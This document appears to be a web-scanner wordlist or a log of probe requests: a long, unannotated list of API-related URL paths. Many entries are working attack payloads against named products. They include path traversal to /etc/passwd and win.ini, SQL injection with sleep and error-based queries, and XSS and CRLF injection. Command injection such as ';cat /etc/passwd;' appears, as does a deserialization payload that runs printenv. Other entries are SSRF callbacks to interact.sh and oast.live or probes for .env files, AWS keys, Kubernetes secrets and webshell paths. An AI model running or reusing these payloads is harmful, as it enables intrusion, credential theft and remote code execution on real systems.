/./RestAPI/Connection
/./RestAPI/LogonCustomization
/.api_keys
/.aws/api-keys
/.env-fastapi
/.env.test.localapi/.env
/.well-known/ALFA_DATA/alfacgiapi/perl.alfa
/.well-known/acme-challenge/class.api.php
/.well-known/class.api.php
/.well-known/pki-validation/class.api.php
/ALFA_DATA/ALFA_DATA/alfacgiapi/
/ALFA_DATA/alfacgiapi
/ALFA_DATA/alfacgiapi/
/ALFA_DATA/alfacgiapi/perl.alfa
/ALFA_DATA/alfacgiapi/perl.alfa%22
/API/.env
/API/.env.bak
/API/.env.dev
/API/.env.local
/API/External/GetPrivacy
/API/V1/credentials
/API/config.env
/Api/.env
/Api/portal/elementEcodeAddon/getSqlData?sql
/Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes(\\'MD5\\',\\'999999999\\')),3,32)
/DevicesGateway/apps/system-app-metadata/1?packageId=../../../../API/system/admins/search?status=active%3fogname=Global
/DevicesGateway/apps/system-app-metadata/1?packageId=../../../../API/system/groups/apikeys%3fogname=Global
/RemoteControlAuth/api/Auth
/RestAPI/ImportTechnicians
/RestAPI/getAPIKey
/SAAS/API/1.0/REST/oauth2/generateActivationToken/Service__OAuth2Client
/ServletAPI/accounts/login
/Sources/API/.env
/VisionHubWebApi/api/Login
/WebConsole/api/security/auth/loginServers
/_api/*
/_api/site
/_api/version
/_api/web
/_api/web/lists
/_api/web/roledefinitions
/_api/web/siteusers
/_internal/api/setup.php?action=exists
/_next/api
/about/class.api.php
/admin-api/
/administrator/components/com_ubackapi/aws_lambda_config.json
/ajax-api/2.0/mlflow/experiments/create
/ajax-api/2.0/mlflow/experiments/list
/ajax-api/2.0/mlflow/model-versions/create
/ajax-api/2.0/mlflow/registered-models/create
/ajax/api/ad/wrapAdTemplate
/ajax/api/content_infraction/getIndexableContent
/ajax/api/user/save
/ajaxfilemanager/class.api.php
/alfacgiapi/
/alfacgiapi/bypass.php
/alfacgiapi/perl.alfa
/alfacgiapi/perl.alfa.php
/alfresco/api/-default-/public/cmis/versions/1.1/atom
/analytics/telemetry/ph/api/hyper/send?_c&_i=test
/answer/api/v1/siteinfo
/api
/api-config.ini
/api-description
/api-docs/swagger.json
/api-key.txt
/api-server/.env
/api-third-party/download/extdisks../etc/passwd
/api.InternalService/Login
/api.Z
/api.db
/api.jar
/api.key
/api.lz
/api.php
/api.php?action=logout&forward=http://interact.sh
/api.php?mod[]=auto
/api.rar
/api.sql.7z
/api.sql.bz2
/api.sql.gz
/api.sql.lz
/api.sql.rar
/api.sql.tar.gz
/api.sql.tar.z
/api.sql.xz
/api.sql.z
/api.sql.zip
/api.sqlite
/api.tar.bz2
/api.tar.gz
/api.tar.z
/api.tgz
/api.war
/api.xz
/api.z
/api/
/api/%3Cimg%20src=%22%22%20onerror=alert(document.domain)%3E
/api/*
/api/.env
/api/.env.BAK
/api/.env.aws
/api/.env.back
/api/.env.bak
/api/.env.bk
/api/.env.crt
/api/.env.db
/api/.env.dev
/api/.env.development
/api/.env.example
/api/.env.local
/api/.env.old
/api/.env.production
/api/.env.sample
/api/.env.save
/api/.env.staging
/api/.env0
/api/.env0.1
/api/.env0.2
/api/.env_1.bak
/api/.env_bak
/api/.git/config
/api/.npmignore
/api/1/site/content_store/children?url=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E
/api/1/site/content_store/item?url=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E
/api/1/site/url/transform?transformerName=%3Cscript%20xmlns%3D%22http%3A//www.w3.org/1999/xhtml%22%3Ealert(document.domain)%3C/script%3E&url
/api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd
/api/2.0/mlflow-artifacts/artifacts/3BLaLvQQSqXLAtgENcv9ZfOcQQZ
/api/2.0/mlflow/experiments/list
/api/2.0/mlflow/model-versions/create
/api/2.0/mlflow/registered-models/create
/api/2.0/mlflow/registered-models/list
/api/2.0/mlflow/users/create
/api/2.0/preview/mlflow/experiments/list
/api/396WibEAlk5aZz9NK1FyrKb1s9D
/api/BetterImageGallery/imagehandler?path=../../../Web.Config
/api/Image/withpath/C:%5CWindows%5Cwin.ini
/api/Notify
/api/_status
/api/account/auth/form
/api/account/avatar
/api/action
/api/action?_cb=2875852938078444935
/api/action?_cb=344115657323525406
/api/action?_cb=7773403330850672911
/api/actions
/api/actuator
/api/add-article-by-text
/api/admin
/api/admin/auth
/api/admin/config
/api/admin/login
/api/admin/role
/api/admin/role/id
/api/admin/user
/api/admin/user/password
/api/admin/user/status
/api/agent
/api/agent/tabs/agentData
/api/agent/tasks
/api/agents
/api/alertmanager/grafana/config/api/v1/alerts
/api/answer
/api/api-browser/
/api/api-docs/swagger.json
/api/api.php/%3Cscript%3Ealert%28document.domain%29%3C/script%3E
/api/application.wadl
/api/assets
/api/assets/upload
/api/asyncapi
/api/attachments
/api/auth
/api/auth.json
/api/auth/*
/api/auth/callback?_cb=5842747254861621845
/api/auth/callback?_cb=6573679130853499933
/api/auth/cognito/callback?access_token=zygotkau&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJjb2duaXRvOnVzZXJuYW1lIjoienVtanB5bmV5byIsImVtYWlsIjoie3tlbWFpbH19In0=.
/api/auth/csrf?_cb=3746131289318276244
/api/auth/csrf?_cb=5651577777016463449
/api/auth/csrf?_cb=8480417687412483036
/api/auth/login
/api/auth/login?p=Login&t=1
/api/auth/providers?_cb=5458853479297847870
/api/auth/providers?_cb=8377396626246447314
/api/auth/session?_cb=1707484401092585585
/api/auth/session?_cb=8645235041032407874
/api/auth/signin?_cb=1797629538938359038
/api/auth/signin?_cb=5977808681075910403
/api/auth/signin?_cb=677974112749019814
/api/auth/signout?_cb=3168365372030025244
/api/auth/signout?_cb=5109661955973086734
/api/auth/signout?_cb=6846193952935835816
/api/auth/v1/pin/verify
/api/auth:signIn
/api/auth?_cb=3476371618821075585
/api/authenticate
/api/authentication
/api/authentication/login
/api/aws/\\\\xe8\\\\xaa\\\\x8d\\\\xe8\\\\xa8\\\\xbc\\\\xe6\\\\x83\\\\x85\\\\xe5\\\\xa0\\\\xb1.json
/api/aws/anmeldeinformationen.json
/api/aws/config.bak
/api/aws/credentials.json
/api/aws/secret.yml
/api/awsconfig.json
/api/axis
/api/backend/v1/version
/api/backup
/api/batch/upload
/api/beszel/first-run
/api/blade-user/user-list
/api/blob
/api/blob/upload
/api/brain
/api/bulk-upload
/api/cache?data=%7B%22cmd%22%3A%22printenv%22%2C%22token%22%3A%221337%22%2C%22data%22%3A%22%24%28printenv%29%22%7D
/api/cache?data=%7B%22rce%22%3A%22_%24%24ND_FUNC%24%24_function%20%28%29%7Brequire%28%27child_process%27%29.exec%28%27printenv%27%2C%20function%28error%2C%20stdout%2C%20stderr%29%20%7B%20console.log%28stdout%29%20%7D%29%3B%7D%28%29%22%7D
/api/cask/graphql-playground
/api/catalog/images
/api/chain
/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd
/api/chat
/api/chat/get-chat-session/1?is_shared=True
/api/checkout?_cb=1851781158944229493
/api/checkout?_cb=4868075305421096259
/api/checkout?_cb=5344644963168551875
/api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(6)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1
/api/cluster_status
/api/clusters
/api/command
/api/components/search_projects
/api/components/suggestions?recentlyBrowsed
/api/config
/api/config.env
/api/config.js
/api/config.json
/api/config.php
/api/config.yaml
/api/config/
/api/config/.env
/api/config/aws.php
/api/config/config.yml
/api/config/tsconfig.json
/api/config/types
/api/config?_cb=2115362755824568060
/api/config?_cb=3442239368941607724
/api/console/api_server?sense_version=%40%40SENSE_VERSION&apis=../../../../../../../../../../../etc/passwd
/api/contact?_cb=3747017308938297157
/api/contact?_cb=6595033727484202664
/api/contact?_cb=7732427630383358514
/api/content/
/api/content/upload
/api/conversations
/api/credentials
/api/crews
/api/cron?_cb=1659064018743460203
/api/cron?_cb=8249819490686463468
/api/cron?_cb=9119971763409090513
/api/dashboard/cluster
/api/dashboards/home
/api/data
/api/data/*
/api/database
/api/datasources
/api/db/connect
/api/dbstat/gettablessize
/api/debug
/api/decode?payload=%7B%22cmd%22%3A%22printenv%22%2C%22token%22%3A%221337%22%2C%22data%22%3A%22%24%28printenv%29%22%7D
/api/decode?payload=%7B%22rce%22%3A%22_%24%24ND_FUNC%24%24_function%20%28%29%7Brequire%28%27child_process%27%29.exec%28%27printenv%27%2C%20function%28error%2C%20stdout%2C%20stderr%29%20%7B%20console.log%28stdout%29%20%7D%29%3B%7D%28%29%22%7D
/api/deployments
/api/detect
/api/dns
/api/doc
/api/docs
/api/docs/
/api/docs/asyncapi
/api/documents
/api/documents/upload
/api/downloads?fileName=../../../../../../../../etc/passwd
/api/dp/rptsvcsyncpoint?ccid=1
/api/drive/upload
/api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9
/api/email/config
/api/email?_cb=6501676870736010186
/api/email?_cb=7999581713953502976
/api/email?_cb=8963200235767225296
/api/env
/api/env/
/api/environment/
/api/experiment
/api/experimental/dags/example_trigger_target_dag/dag_runs
/api/experimental/dags/example_trigger_target_dag/paused/false
/api/experimental/latest_runs
/api/experimental/patternfile?order=id%3Bselect(md5(999999999))&page=0&page_size=0
/api/experimental/test
/api/export-auth
/api/external/7.0/system.System.get_infos
/api/extra/version
/api/fabric/device/status
/api/feed?_cb=3187509906086311007
/api/feed?_cb=4023600154125714238
/api/file/formimage
/api/file?path=../../etc/passwd
/api/filemanager?path=%2F..%2f..%2fContent
/api/files
/api/files.remote.share
/api/files/upload
/api/flows
/api/frontend/settings
/api/gallery/upload
/api/gateway
/api/gen/clients/csharp
/api/generate
/api/geojson?url=file:///c://windows/win.ini
/api/geojson?url=file:///etc/passwd
/api/get-browser-snapshot?snapshot_path=/etc/passwd
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField&sortOrder&field=updatexml(1,version(),1)
/api/get-users?p=123&pageSize=123
/api/get_device_details
/api/get_nonce/?controller=user&method=register&insecure=cool
/api/gql
/api/gql?_cb=8413584376953019188
/api/gql?_cb=8945913733483434736
/api/graphql
/api/graphql/v1
/api/graphql?_cb=6375029382106202492
/api/graphql?query={__typename}
/api/group/list
/api/handlers
/api/hassio/app/.%09./supervisor/info
/api/hassio/app/.%252e/supervisor/info
/api/hassio_ingress/.%09./supervisor/info
/api/health
/api/health/ready
/api/health?_cb=3236606186705623122
/api/healthcheck?_cb=2113028697631362508
/api/healthcheck?_cb=657635186391303554
/api/help\\'onmouseover=alert(document.domain)/\\'/;/beta/license
/api/home
/api/image/cover-upload?filename=../appsettings.json
/api/images
/api/images/upload
/api/import
/api/index.html
/api/index.php/v1/config/application
/api/index.php/v1/config/application?public=true
/api/info
/api/info.php
/api/internal/
/api/jemboedqyuda123456789
/api/jmeter/download/files
/api/jobs/
/api/jobs/Job_mnzZjn/logs
/api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html
/api/json
/api/json/session/signin
/api/jsonrpc
/api/jsonws
/api/jsonws/invoke
/api/kernel/status
/api/kernels
/api/kernelspecs
/api/keys
/api/kfile/?user/login
/api/kfile/index.php?user/login
/api/leaderboard/v1/attributes/search
/api/liferay
/api/login
/api/login/
/api/login/unlockGetData
/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;
/api/mail/config
/api/manage/connector
/api/manage/document-set
/api/manager/submit?group=1&username=7kpsrt&password=3BHgPVqRSzQ0
/api/mcp
/api/me
/api/me?_cb=3990232221787792066
/api/me?_cb=4872593295432473167
/api/media
/api/media/upload
/api/metrics
/api/model_report/file/download?index=/&ext=/etc/passwd
/api/models
/api/modular-connector/
/api/modular-connector/login/losxh?origin=mo&type=foo
/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test
/api/moduleInformation
/api/multipart
/api/notify?_cb=8955156140283485120
/api/notify?_cb=954873848026280709
/api/objects/codes.php.save
/api/og?_cb=2796441762560115114
/api/og?_cb=4860538403574728047
/api/open_file
/api/operations/ciscosb-file:form-file-upload
/api/org
/api/payments?_cb=5437691880253479205
/api/payments?_cb=7968762156465600862
/api/photos
/api/phpinfo.php
/api/ping/;%60id%60
/api/ping?_cb=8437589734165446434
/api/ping?_cb=9066599593068854789
/api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp
/api/portal/v1.4/appinfo
/api/portalTsLogin/utils/getE9DevelopAllNameValue2?fileName=portaldev_%2f%2e%2e%2fweaver%2eproperties
/api/postman.json
/api/postmark.js
/api/predict
/api/presets/?filter=true
/api/private/
/api/products/images
/api/products/upload
/api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9599528)))),0x7e),3550)
/api/profile
/api/profile/avatar
/api/profile/photo
/api/project
/api/projects
/api/providers
/api/proxy/tcp
/api/ps
/api/public/configuration
/api/public/health
/api/public/models
/api/query
/api/raster/search/?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)--
/api/register
/api/report
/api/requestlogs
/api/resetpassword
/api/resources/upload
/api/results
/api/revalidate?_cb=2350547292498565267
/api/revalidate?_cb=5269858494991668927
/api/route
/api/router/mesh/status
/api/runs
/api/runscript
/api/s3/upload
/api/savefile
/api/scim/v2/Users
/api/scrape/kube-system
/api/search
/api/search/attribute?versionid=*&tf_version=%27+and+(select%20pg_sleep(7))+ISNULL--
/api/search?type=dash-db
/api/secrets.json
/api/security/ticket
/api/send?_cb=4635137082159624085
/api/send?_cb=8518809776773572309
/api/send?_cb=945605304437519524
/api/sendgrid
/api/sendgrid.js
/api/serve/applications
/api/serve/deployments
/api/server
/api/server-info/ping
/api/server-info/version
/api/server/about
/api/server/version
/api/serverless/*
/api/service
/api/services
/api/session/properties
/api/session?cookie=%7B%22cmd%22%3A%22printenv%22%2C%22token%22%3A%221337%22%2C%22data%22%3A%22%24%28printenv%29%22%7D
/api/session?cookie=%7B%22rce%22%3A%22_%24%24ND_FUNC%24%24_function%20%28%29%7Brequire%28%27child_process%27%29.exec%28%27printenv%27%2C%20function%28error%2C%20stdout%2C%20stderr%29%20%7B%20console.log%28stdout%29%20%7D%29%3B%7D%28%29%22%7D
/api/sessions
/api/settings
/api/settings/get
/api/settings/values
/api/settings?_cb=6518539558078469127
/api/settings?_cb=7953986080645460316
/api/setup-complete
/api/setup/backup
/api/shared/.env
/api/shared/config.env
/api/shared/config/.env
/api/shared/config/config.env
/api/show
/api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview?previewPath=/App_Data/license.xml
/api/sitemap?_cb=1434914615607578152
/api/sitemap?_cb=8264537130154753963
/api/skills
/api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20md5(999999999)),0x7e),1)--%20
/api/snapshots
/api/snapshots/:key
/api/sonicos/auth
/api/sonicos/is-sslvpn-enabled
/api/sonicos/tfa
/api/spec/swagger.json
/api/src/.env
/api/src/mailer.ts
/api/stats
/api/status
/api/status?_cb=3677684776777596749
/api/status?_cb=8009695132418402868
/api/storage
/api/storage/local
/api/storage/upload
/api/stripe.js
/api/stripe.ts
/api/stripe?_cb=1478044547749957874
/api/stripe?_cb=2249834648550014576
/api/subscribe?_cb=3131163293819925805
/api/subscribe?_cb=3354941812946671864
/api/subscribe?_cb=5054565096499794113
/api/subscriber
/api/swagger-ui/swagger.json
/api/swagger.json
/api/swagger.yml
/api/sys
/api/sys/login
/api/sys/set_passwd
/api/system
/api/system/ExecuteSqlForSingle
/api/system/deviceinfo
/api/system/info
/api/system/options/core.email
/api/system/status
/api/systeminfo
/api/tags
/api/task
/api/tasks
/api/tenants
/api/test
/api/test-runs
/api/test.php
/api/thumbnail
/api/timelion/run
/api/tokens
/api/tools
/api/traces
/api/trpc
/api/trpc?_cb=5567115736777329999
/api/tts
/api/typebots
/api/ui_settings/
/api/upload
/api/upload?_cb=1588647314942164017
/api/upload?_cb=4033284448736264525
/api/uploads
/api/upwload
/api/user
/api/user/
/api/user/login
/api/user/reg
/api/user?_cb=1126637072871603824
/api/user?_cb=193623830829240646
/api/userrolelist/systemRoles?require-cfg.js
/api/users
/api/users/*
/api/users/admin/check
/api/users/avatar
/api/users/search_authors
/api/users?_cb=2781005171292127484
/api/users?_cb=7672101640965704094
/api/v0/compliance/profiles/search
/api/v0/train
/api/v1
/api/v1.0/environment
/api/v1.0/predictions
/api/v1.0/web/retained-data
/api/v1.index.article/getList.html?field=id,md5(999999999)&size=1&cat=3&time_stamp=1781864476
/api/v1.index.goods/getList.html?field=id,md5(999999999)&activity_type=hot&time_stamp=1781864476
/api/v1/
/api/v1/*
/api/v1/.env
/api/v1/GetDevice
/api/v1/GetSrc
/api/v1/account/oauth/ticket
/api/v1/account/oauth/token
/api/v1/apikey?/api/v1/ping
/api/v1/app/config
/api/v1/app/version
/api/v1/applications
/api/v1/artifact/getArtifact?artifact_path=../../../../../etc/passwd
/api/v1/auth
/api/v1/auth/force-reset-password
/api/v1/auth/tokens/
/api/v1/auth/user/signin
/api/v1/auths/signin
/api/v1/auto_login
/api/v1/aws/config.json
/api/v1/bots
/api/v1/canal/config/1/1
/api/v1/cav/client/status/../../admin/options
/api/v1/cav/client/visits
/api/v1/chart/data
/api/v1/chat
/api/v1/chatflows
/api/v1/check-version
/api/v1/checks
/api/v1/cluster/summary
/api/v1/clusters/kubeconfig/k8s
/api/v1/collections
/api/v1/collections?tenant=default_tenant&database=default_database
/api/v1/components
/api/v1/components?name=1&1%5B0%5D&1%5B1%5D=a&1%5B2%5D&1%5B3%5D=or+\\'a\\'=\\'a\\')%20and%20(select%20sleep(6))--
/api/v1/config
/api/v1/config/application?public=true
/api/v1/confup?mode&uid=1\\'%20UNION%20select%201,2,3,4,sqlite_version();--
/api/v1/confup?mode=lean&uid=1\\'%20UNION%20select%201,2,3,sqlite_version();--
/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live
/api/v1/credentials
/api/v1/data?chart=system.cpu&format=json&points=125&group=average&gtime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait
/api/v1/database/1
/api/v1/database/10
/api/v1/database/2
/api/v1/database/3
/api/v1/database/4
/api/v1/database/5
/api/v1/database/6
/api/v1/database/7
/api/v1/database/9
/api/v1/debug
/api/v1/devices
/api/v1/documents
/api/v1/executions
/api/v1/experiments
/api/v1/files
/api/v1/finchat/contact/manager
/api/v1/finchat/open-api
/api/v1/finchat/open-api/auth/token
/api/v1/finchat/privilege-api/forwarder
/api/v1/finchat/privilege-api/forwarder/event
/api/v1/flags
/api/v1/flows
/api/v1/functions
/api/v1/getbaseconfig
/api/v1/health
/api/v1/heartbeat
/api/v1/info
/api/v1/info/version
/api/v1/label/__name__/values
/api/v1/licensing/about
/api/v1/login
/api/v1/login/oauth2/auth
/api/v1/login?include_cookie=true
/api/v1/markdown/link:metadata?link=http://localhost:13042
/api/v1/master
/api/v1/me
/api/v1/media
/api/v1/messages
/api/v1/method.callAnon/getPasswordPolicy
/api/v1/method.callAnon/sendForgotPasswordEmail
/api/v1/model
/api/v1/models
/api/v1/namespaces
/api/v1/namespaces/default/pods
/api/v1/namespaces/default/secrets
/api/v1/namespaces/default/services
/api/v1/namespaces/default/workflows?query
/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs
/api/v1/ndconfig?mode&uid=1\\'%20UNION%20select%201,2,3,sqlite_version();--
/api/v1/ndconfig?mode=lean&uid=1\\'%20UNION%20select%201,2,3,sqlite_version();--
/api/v1/netdisk/download
/api/v1/nodes
/api/v1/orgs
/api/v1/participants
/api/v1/pieces
/api/v1/pods
/api/v1/projects
/api/v1/query
/api/v1/recognition/faces
/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
/api/v1/runs
/api/v1/search?key=%27%20and%20extractvalue(1,concat(0x7e,%2738feea969eb06a38c83545ef05b44993%27,0x7e))--%20a
/api/v1/serverinfo
/api/v1/services
/api/v1/session
/api/v1/sessions
/api/v1/settings
/api/v1/signin
/api/v1/sms-sender
/api/v1/status
/api/v1/status/config
/api/v1/status/flags
/api/v1/system
/api/v1/table
/api/v1/targets
/api/v1/tasks
/api/v1/tenants/default_tenant
/api/v1/terminal/sessions/
/api/v1/tokens
/api/v1/tools
/api/v1/totp/user-backup-code/../../system/system-information
/api/v1/upload
/api/v1/user/login
/api/v1/user/save?ID&Username=87mtc&Role=%e7%ae%a1%e7%90%86%e5%91%98&Enable=true
/api/v1/userlist?pageindex=0&pagesize=10
/api/v1/users
/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
/api/v1/users/avatar
/api/v1/users/login
/api/v1/users/signin
/api/v1/users/signup
/api/v1/validate/code
/api/v1/version
/api/v1/versions
/api/v1/viewer
/api/v1/workers
/api/v1/workflows
/api/v1/workspace
/api/v1?_cb=2621270267019829659
/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi
/api/v2.0/systeminfo
/api/v2.13/server.info
/api/v2.20/server.info
/api/v2/.env
/api/v2/about
/api/v2/cmdb/system/admin
/api/v2/cmdb/system/admin/admin
/api/v2/cmdb/system/global
/api/v2/files
/api/v2/hoverfly/middleware
/api/v2/hoverfly/version
/api/v2/info
/api/v2/login
/api/v2/observables/extended
/api/v2/open/rowsInfo
/api/v2/parameters/core/
/api/v2/server/about
/api/v2/simulation
/api/v2/templates/
/api/v2/tenants/default_tenant/databases/default_database/collections
/api/v2/testing
/api/v2?_cb=3971473277482370555
/api/v2?_cb=4447562925417114340
/api/v3
/api/v3/9MYAm9X7/../announcements
/api/v3/bA6CtZUm/../announcements
/api/v3/meta
/api/v3/user/orgs
/api/v3/users
/api/v3?_cb=5102252937666290442
/api/v3?_cb=6674211138836275847
/api/v3?_cb=9007877355420092624
/api/v4/auth
/api/v4/ci/lint
/api/v4/ci/lint?include_merged_yaml=true
/api/v4/projects
/api/v4/users/100
/api/v4/users/19
/api/v4/users/23
/api/v4/users/26
/api/v4/users/29
/api/v4/users/31
/api/v4/users/32
/api/v4/users/35
/api/v4/users/37
/api/v4/users/38
/api/v4/users/40
/api/v4/users/42
/api/v4/users/43
/api/v4/users/48
/api/v4/users/5
/api/v4/users/50
/api/v4/users/53
/api/v4/users/54
/api/v4/users/55
/api/v4/users/56
/api/v4/users/57
/api/v4/users/58
/api/v4/users/59
/api/v4/users/62
/api/v4/users/65
/api/v4/users/67
/api/v4/users/68
/api/v4/users/73
/api/v4/users/78
/api/v4/users/80
/api/v4/users/81
/api/v4/users/82
/api/v4/users/86
/api/v4/users/87
/api/v4/users/89
/api/v4/users/90
/api/v4/users/91
/api/v4/users/93
/api/v4/users/95
/api/v4/users/98
/api/v4/users/99
/api/v5/login
/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/api/version
/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/1
/api/voices
/api/webhook.js
/api/webhook/*
/api/webhook?_cb=4981382212766138921
/api/webhook?_cb=8271591564082224200
/api/webhook?_cb=9140695878820297265
/api/webhooks/postmark.php
/api/webhooks/sendgrid.php
/api/webhooks?_cb=3229213450529626648
/api/webhooks?_cb=8322773477955162370
/api/webhooks?_cb=8538016210541803982
/api/whoami
/api/workflows
/api/xml
/api137.php
/api2/server-info/
/api;/config
/api?_cb=6570551921038791332
/api?_cb=7884271637956459825
/api?path=files&id=dfsse%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ez1668cyj2pi&revision=%22%22&type=%22thumb%22&command=url&expires=1687785968527
/api_\\\\xe3\\\\x82\\\\xad\\\\xe3\\\\x83\\\\xbc/aws_\\\\xe3\\\\x82\\\\xad\\\\xe3\\\\x83\\\\xbc.json
/api_config.json
/api_dev.php/_profiler/empty/search/results?limit=10
/api_download.php
/api_keys.js
/api_keys.json
/api_keys.txt
/api_keys/aws_keys.json
/api_keys/mailer_dsn.json
/api_keys/mailer_url.json
/api_keys/sendgrid_keys.json
/api_smartapp/storage/
/apiclient/ember/Login.jsp
/apiclient/index.jsp
/apikey.txt
/apikeys.json
/apimanui/api-manager
/apis
/apis/.env
/apis/.env.local
/apis/.env.production
/apis/.env.staging
/apis/apps/v1/namespaces/default/deployments
/apis/authorization.k8s.io/v1/selfsubjectaccessreviews
/apis/config/config.js
/apis/controllers/users.js
/apis/kubeflow.org
/apiserver-etcd-client.key
/apisix/admin/migrate/export
/apisix/admin/routes
/apisix/admin/user/login
/apisix/batch-requests
/apismtp/apismtp.php
/app/api/bzycs.php
/app/config/pimcore/google-api-private-key.json
/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/jBVL.css
/artifactory/api/build
/artifactory/api/repositories
/as/class.api.php
/as/wapi/vmp
/asyncapi
/asyncapi.json
/asyncapi.yaml
/asyncapi.yml
/asynchPeople/api/json
/basic-api/login
/bi/api/Portal/LoginWithV8/?ticket=/../../../../Windows/win.ini
/blog/wp-content/themes/haberadam/api/mobile-info.php?id
/centreon/api/latest/platform/versions
/cgi-bin/ALFA_DATA/alfacgiapi/
/cgi-bin/class.api.php
/cgi-bin/live_api.cgi?page=Dw0&id=7&ip=;id;
/cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users
/chosen/class.api.php
/class-envato-market-api.php
/class-t.api.php
/class.api.php
/class_api.php
/client/api/
/client/api?command=samlSso
/cms/tiny_mce/plugins/ajaxfilemanager/class.api.php
/cobbler_api
/code/api/.env
/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(999999999)))),@`%27`
/console/api/setup
/console/api/system-features
/controller/api/post.js
/css/ALFA_DATA/alfacgiapi/perl.alfa
/css/class.api.php
/cxrestapi/auth/identity/.well-known/openid-configuration
/cxrestapi/help/system/version
/de2api/engine/getEngine;.js
/de2api/user/info
/decisioncenter-api/v1/about
/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/dev-api/
/dip/api/login
/dniapi/userInfos
/docs/asyncapi
/dview8/api/usersByLevel
/email_v2/js/tiny_mce/plugins/ajaxfilemanager/class.api.php
/eonapi/createEonUser?username=admin&apiKey=3142b6a55a3db2cfec4bfacd2dfed4ada06e8d26134fba9ce447d6a1aa72f3b9
/eonapi/getApiKey?username=%27%20union%20select%201,%27admin%27,%271c85d47ff80b5ff2a4dd577e8e5f8e9d%27,0,0,1,1,8%20or%20%27&password=h4knet
/eonapi/getApiKey?username=%27%20union%20select%20sleep(6),0,0,0,0,0,0,0%20or%20%27
/evo-apigw/evo-oauth/oauth/token
/exapi/.env
/fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails
/fhir-api/.env
/file/class.api.php
/files/ALFA_DATA/alfacgiapi/perl.alfa
/form/api/asset
/form/api/assets
/form/api/attachment
/form/api/attachments
/form/api/avatar
/form/api/blob
/form/api/content
/form/api/document
/form/api/documents
/form/api/file
/form/api/files
/form/api/image
/form/api/images
/form/api/import
/form/api/media
/form/api/storage
/form/api/submit
/form/api/upload
/form/api/uploads
/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;
/ghost/api/admin/session
/go/add-on/business-continuity/api/cipher.aes
/go/add-on/business-continuity/api/cruise_config
/go/add-on/business-continuity/api/plugin?folderName&pluginName=../../../etc/passwd
/google-api-private-key.json
/gradio_api/file=http://example.com
/graphql/api
/grems-api/.env
/hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat
/hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true
/him/api/rest/V1.0/system/log/list?filePath=../
